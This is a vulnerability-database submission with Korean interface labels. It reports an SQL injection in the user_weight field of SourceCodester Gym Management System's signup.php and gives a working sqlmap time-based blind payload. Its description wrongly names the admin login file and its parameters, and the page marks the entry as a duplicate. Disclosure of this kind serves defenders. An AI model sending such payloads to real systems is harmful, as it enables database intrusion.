| 제목 | SOURCECODESTER GYM MANAGEMENT SYSTEM /MYGYM/signup.php user_weight SQL INJECTION |
|---|
| 설명 | Affected by this vulnerability is some unknown processing of the file /mygym/admin/login.php. The manipulation of the argument admin_email/admin_pass with an unknown input leads to a sql injection vulnerability.
When a registration request is submitted via POST, modify user_weight for SQL injection
sqlmap:
Parameter: user_weight (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: user_name=weicheng&[email protected]&user_pass=weicheng&user_weight=200' AND (SELECT 7321 FROM (SELECT(SLEEP(5)))xGiV) AND 'qEsw'='qEsw&user_age=20&user_contact=18888888888&user_signup=Submit |
|---|
| 원천 | ⚠️ https:// www.sourcecodester.com/php/15515/gym-management-system-project-php.html |
|---|
| 사용자 | weicheng (UID 30823) |
|---|
| 제출 | 2022. 08. 10. AM 10:32 (4 연령 ago) |
|---|
| 모더레이션 | 2022. 08. 11. AM 11:22 (1 day later) |
|---|
| 상태 | 중복 |
|---|
| VulDB 항목 | 205855 [SourceCodester Gym Management System /mygym/admin/login.php admin_email/admin_pass SQL 주입] |
|---|
| 포인트들 | 0 |
|---|